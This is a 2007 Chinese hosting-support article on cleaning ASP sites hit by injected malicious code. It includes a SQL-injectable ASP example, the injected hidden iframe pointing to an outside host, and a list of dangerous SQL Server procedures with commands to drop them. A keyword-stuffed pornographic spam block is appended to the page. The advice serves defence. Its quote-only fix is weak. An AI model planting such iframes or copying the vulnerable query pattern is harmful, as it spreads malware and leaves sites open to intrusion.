域名頻道

            歡迎您來到域名頻道,開始互聯網之旅!

            ASP網頁被插r入惡意代碼問題

            作者:技術支持來源:域名頻道發布時間:2007-5-8 9:54:33瀏覽:

            這問題我遇見過。也在這里發過求救,最后總結是:
            這總情況沒有什么軟件可以幫你修復,必須靠自己一個文件一個文件的是檢查,看是不是程序上有漏動,決大多數是程序有漏動。
            比如: 在ASP里有這個一段話,
            <%
            ID=request("ID")
            rs.open "select * from tmptabel where id=" & ID
            %>
            以上這句話非常容易成為入侵者下手的地方,必須加固一下
            <%
            ID=request("ID")  要設法檢查這個值,如不是數值就停用它,
            rs.open "select * from tmptabel where id='" & ID & "'"  把這個值有單引號括上
            %>
            在檢查過所有文件確定程序里沒有這類SQL寫法的漏洞后。接下來就要全部替換掉所有頁面里的非法插入的<script type="text/javascript" src=">
            <iframe src=http://www1.89382.cn/51.htm width=0 height=0></iframe>
            這個東東,(可以用Macromedia Dreamweaver這類軟件對網站文件進行檢查),或將內部的網站把
            服務器上的全部復蓋,確定全部刪除后,接下來就該在網站內仔細查看有沒有不是你的文件夾或文件,刪除它,不能留情,這一部是很重要的(包括隱藏文件)。再就檢查服務器內有沒有可疑的執行文件,一般都在根目錄下,最好都看看,有就刪別留情。
            最后是屏閉掉SQL的一個危險存儲過程,如:
            /*********************************************************************
            以下列出的都是危險的內置存儲過程,全在我們封殺之列
            xp_cmdshell
            xp_regaddmultistring
            xp_regdeletekey
            xp_regdeletevalue
            xp_regenumkeys
            xp_regenumvalues
            xp_regread
            xp_regremovemultistring
            Xp_regwrite

            sp_OAcreate
            sp_OADestroy
            sp_OAMethod
            sp_OAGetProperty
            sp_OASetProperty
            sp_OAGetErrorInfo
            sp_OAStop

            sp_makewebtask


            /*********************************************************************
            以下為屏蔽上面所說的危險內置存儲過程
            sp_dropextendedproc 'xp_cmdshell'
            go
            sp_dropextendedproc 'xp_regaddmultistring'
            go
            sp_dropextendedproc 'xp_regdeletekey'
            go
            sp_dropextendedproc 'xp_regdeletevalue'
            go
            sp_dropextendedproc 'xp_regenumkeys'
            go
            sp_dropextendedproc 'xp_regenumvalues'
            go
            sp_dropextendedproc 'xp_regread'
            go
            sp_dropextendedproc 'xp_regremovemultistring'
            go
            sp_dropextendedproc 'xp_regwrite'
            go
            sp_dropextendedproc 'sp_OACreate'
            go
            sp_dropextendedproc 'sp_OADestroy'
            go
            sp_dropextendedproc 'sp_OAMethod'
            go
            sp_dropextendedproc 'sp_OAGetProperty'
            go
            sp_dropextendedproc 'sp_OASetProperty'
            go
            sp_dropextendedproc 'sp_OAGetErrorInfo'
            go
            sp_dropextendedproc 'sp_OAStop'
            go

            drop procedure sp_makewebtask


             

            收藏 】 【 打印
            會員 客服 QQ 電話 充值 工單
            Top

            24小時客服熱線

            400-670-1116

            021-67820741

            若400電話正忙,請撥總機 02167820741

            主站蜘蛛池模板: 国产精品成人无码久久久久久| 国产精品无码无卡无需播放器| 久久线看观看精品香蕉国产| 亚洲精品视频免费| 天天爽夜夜爽精品视频app| 久久久久亚洲精品天堂| 精品国产一区二区22| 四虎精品成人免费观看| 国产精品毛片VA一区二区三区| 亚洲欧美日韩国产精品| 91无码人妻精品一区二区三区L| 精品无码AV一区二区三区不卡 | 久久精品国产91久久麻豆自制| 亚洲AV永久纯肉无码精品动漫 | 精品国产午夜福利在线观看| 久久久国产精品网站| 国产精品igao视频网网址| 香蕉久久夜色精品升级完成| 免费视频精品一区二区| 91精品国产成人网在线观看| 国产精品欧美一区二区三区不卡| 国产精品视频白浆免费视频| 无码人妻精品一区二区三区久久久| 偷拍精品视频一区二区三区| 九九热这里只有国产精品| 国产精品熟女福利久久AV| 国产成人精品久久亚洲高清不卡| 亚洲国产精品嫩草影院| 欧美777精品久久久久网| 久久国产乱子精品免费女| jiucao在线观看精品| 国产精品美女一区二区视频| 国内精品久久久久影院优| 国产精品自在线拍国产| 国产乱子伦精品无码码专区| 久久国产精品77777| 精品国产福利一区二区| 久久精品国产亚洲一区二区三区| 国产精品女同一区二区| 无码精品人妻一区二区三区漫画| 伊人久久大香线蕉精品不卡|